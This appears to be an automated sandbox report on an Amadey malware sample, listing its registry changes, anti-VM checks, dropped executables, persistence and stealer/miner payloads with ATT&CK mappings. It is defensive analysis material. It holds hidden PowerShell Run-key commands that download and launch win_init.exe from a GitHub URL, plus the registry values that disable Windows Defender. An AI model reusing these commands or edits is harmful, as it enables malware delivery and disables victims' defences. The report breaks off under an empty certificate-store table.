amadey | 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	ef54ab4fd5.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

defense_evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	ef54ab4fd5.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	ef54ab4fd5.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	ef54ab4fd5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	ef54ab4fd5.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	ef54ab4fd5.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	ef54ab4fd5.exe

Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs

evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	ef54ab4fd5.exe

Modifies Windows Defender notification settings 3 TTPs 2 IoCs

defense_evasion trojan

Windows Service

Modify Registry

Disable or Modify Tools

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications	ef54ab4fd5.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	ef54ab4fd5.exe

Modifies security service 2 TTPs 2 IoCs

Modify Registry

Windows Service

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security	reg.exe

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral2/files/0x0007000000024142-294.dat	family_xmrig
behavioral2/files/0x0007000000024142-294.dat	xmrig

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs

Query Registry

Virtualization/Sandbox Evasion

credential_access stealer

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempII4S27SZXSQRE4ZW0GRIEYVVTVDGGGK4.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	e30a4e2837.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ef54ab4fd5.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	e96b36abf6.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempQSYMROVXIDJNXYYOAL33DJHYUDXWM7HQ.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	5d0ced5341.exe

Blocklisted process makes network request 3 IoCs

flow	pid	Process
27	1892	powershell.exe
115	1220	powershell.exe
207	3460	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1892	powershell.exe
1220	powershell.exe
3460	powershell.exe
4828	powershell.exe
2204	powershell.exe
2976	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 12 IoCs

flow	pid	Process
32	756	rapes.exe
32	756	rapes.exe
32	756	rapes.exe
32	756	rapes.exe
32	756	rapes.exe
32	756	rapes.exe
32	756	rapes.exe
32	756	rapes.exe
32	756	rapes.exe
115	1220	powershell.exe
207	3460	powershell.exe
27	1892	powershell.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
2132	takeown.exe
3232	icacls.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 13 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

Steal Web Session Cookie

T1539

Modify Authentication Process

pid	Process
5508	chrome.exe
5364	chrome.exe
2744	chrome.exe
6352	msedge.exe
4232	msedge.exe
7112	msedge.exe
4904	msedge.exe
5940	msedge.exe
3004	msedge.exe
6480	msedge.exe
628	msedge.exe
5964	msedge.exe
5504	chrome.exe

Checks BIOS information in registry 2 TTPs 16 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempII4S27SZXSQRE4ZW0GRIEYVVTVDGGGK4.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	e30a4e2837.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5d0ced5341.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5d0ced5341.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempQSYMROVXIDJNXYYOAL33DJHYUDXWM7HQ.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ef54ab4fd5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempII4S27SZXSQRE4ZW0GRIEYVVTVDGGGK4.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempQSYMROVXIDJNXYYOAL33DJHYUDXWM7HQ.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	e30a4e2837.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ef54ab4fd5.exe

Checks computer location settings 2 TTPs 8 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation	11.exe
Key value queried	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation	11.exe
Key value queried	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation	TempII4S27SZXSQRE4ZW0GRIEYVVTVDGGGK4.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation	apple.exe

Executes dropped EXE 19 IoCs

pid	Process
924	TempII4S27SZXSQRE4ZW0GRIEYVVTVDGGGK4.EXE
756	rapes.exe
2580	cUpXaxB.exe
1840	apple.exe
4828	11.exe
4844	11.exe
1884	Jq0hGDZ.exe
2724	84c9895e7a.exe
4920	rapes.exe
3788	TempQSYMROVXIDJNXYYOAL33DJHYUDXWM7HQ.EXE
3832	483d2fa8a0d53818306efeb32d3.exe
2444	QL4t9UZ.exe
2544	5d0ced5341.exe
4708	e30a4e2837.exe
3304	winhost.exe
5076	winhost.exe
3288	de9077fc34.exe
4732	ef54ab4fd5.exe
1384	e96b36abf6.exe

Identifies Wine through registry keys 2 TTPs 9 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Wine	TempII4S27SZXSQRE4ZW0GRIEYVVTVDGGGK4.EXE
Key opened	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Wine	TempQSYMROVXIDJNXYYOAL33DJHYUDXWM7HQ.EXE
Key opened	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Wine	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Wine	5d0ced5341.exe
Key opened	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Wine	e30a4e2837.exe
Key opened	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Wine	ef54ab4fd5.exe
Key opened	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Wine	e96b36abf6.exe
Key opened	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Wine	rapes.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2132	takeown.exe
3232	icacls.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Windows security modification 2 TTPs 2 IoCs

defense_evasion trojan

Disable or Modify Tools

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	ef54ab4fd5.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	ef54ab4fd5.exe

Adds Run key to start application 2 TTPs 9 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Service 8229 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\10317340101\\Jq0hGDZ.exe\""	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\84c9895e7a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10318740101\\84c9895e7a.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdate = "cmd /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\\Users\\Admin\\AppData\\Roaming\\win_init.exe'\""	QL4t9UZ.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemUpdate = "cmd /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"Start-Sleep -s 30; Start-Process 'C:\\Users\\Admin\\AppData\\Roaming\\win_init.exe' -WindowStyle Hidden\""	QL4t9UZ.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\de9077fc34.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10319020101\\de9077fc34.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ef54ab4fd5.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10319030101\\ef54ab4fd5.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10318750121\\am_no.cmd"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5d0ced5341.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10319000101\\5d0ced5341.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e30a4e2837.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10319010101\\e30a4e2837.exe"	rapes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
264	pastebin.com
266	pastebin.com

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x000e00000001e697-130.dat	autoit_exe
behavioral2/files/0x0007000000024144-303.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 6 IoCs

discovery

Process Discovery

T1057

pid	Process
1900	tasklist.exe
1376	tasklist.exe
3168	tasklist.exe
1392	tasklist.exe
6984	tasklist.exe
6624	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs

pid	Process
924	TempII4S27SZXSQRE4ZW0GRIEYVVTVDGGGK4.EXE
756	rapes.exe
4920	rapes.exe
3788	TempQSYMROVXIDJNXYYOAL33DJHYUDXWM7HQ.EXE
3832	483d2fa8a0d53818306efeb32d3.exe
2544	5d0ced5341.exe
4708	e30a4e2837.exe
4732	ef54ab4fd5.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\rapes.job	TempII4S27SZXSQRE4ZW0GRIEYVVTVDGGGK4.EXE

Launches sc.exe 38 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4796	sc.exe
936	sc.exe
2944	sc.exe
3792	sc.exe
2924	sc.exe
3332	sc.exe
2976	sc.exe
4108	sc.exe
1488	sc.exe
2364	sc.exe
1976	sc.exe
2144	sc.exe
2868	sc.exe
1500	sc.exe
1452	sc.exe
1220	sc.exe
2876	sc.exe
5084	sc.exe
1404	sc.exe
4528	sc.exe
1812	sc.exe
1528	sc.exe
3988	sc.exe
2656	sc.exe
1848	sc.exe
372	sc.exe
4244	sc.exe
4080	sc.exe
988	sc.exe
2772	sc.exe
4672	sc.exe
2956	sc.exe
3452	sc.exe
4880	sc.exe
4620	sc.exe
908	sc.exe
3480	sc.exe
3124	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 41 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	11.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cUpXaxB.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e30a4e2837.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ef54ab4fd5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempQSYMROVXIDJNXYYOAL33DJHYUDXWM7HQ.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempII4S27SZXSQRE4ZW0GRIEYVVTVDGGGK4.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	apple.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	11.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	84c9895e7a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5d0ced5341.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	de9077fc34.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	de9077fc34.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e96b36abf6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	de9077fc34.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe

Delays execution with timeout.exe 2 IoCs

pid	Process
4632	timeout.exe
3184	timeout.exe

Kills process with taskkill 6 IoCs

pid	Process
3692	taskkill.exe
1372	taskkill.exe
2552	taskkill.exe
4848	taskkill.exe
3680	taskkill.exe
372	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000_Classes\Local Settings	firefox.exe

Modifies registry key 1 TTPs 8 IoCs

Modify Registry

defense_evasion spyware trojan

pid	Process
4568	reg.exe
1392	reg.exe
2732	reg.exe
4728	reg.exe
2828	reg.exe
5600	reg.exe
3616	reg.exe
3188	reg.exe

Modifies system certificate store 2 TTPs 5 IoCs

Install Root Certificate

T1553.004

Modify Registry

description	ioc	Process
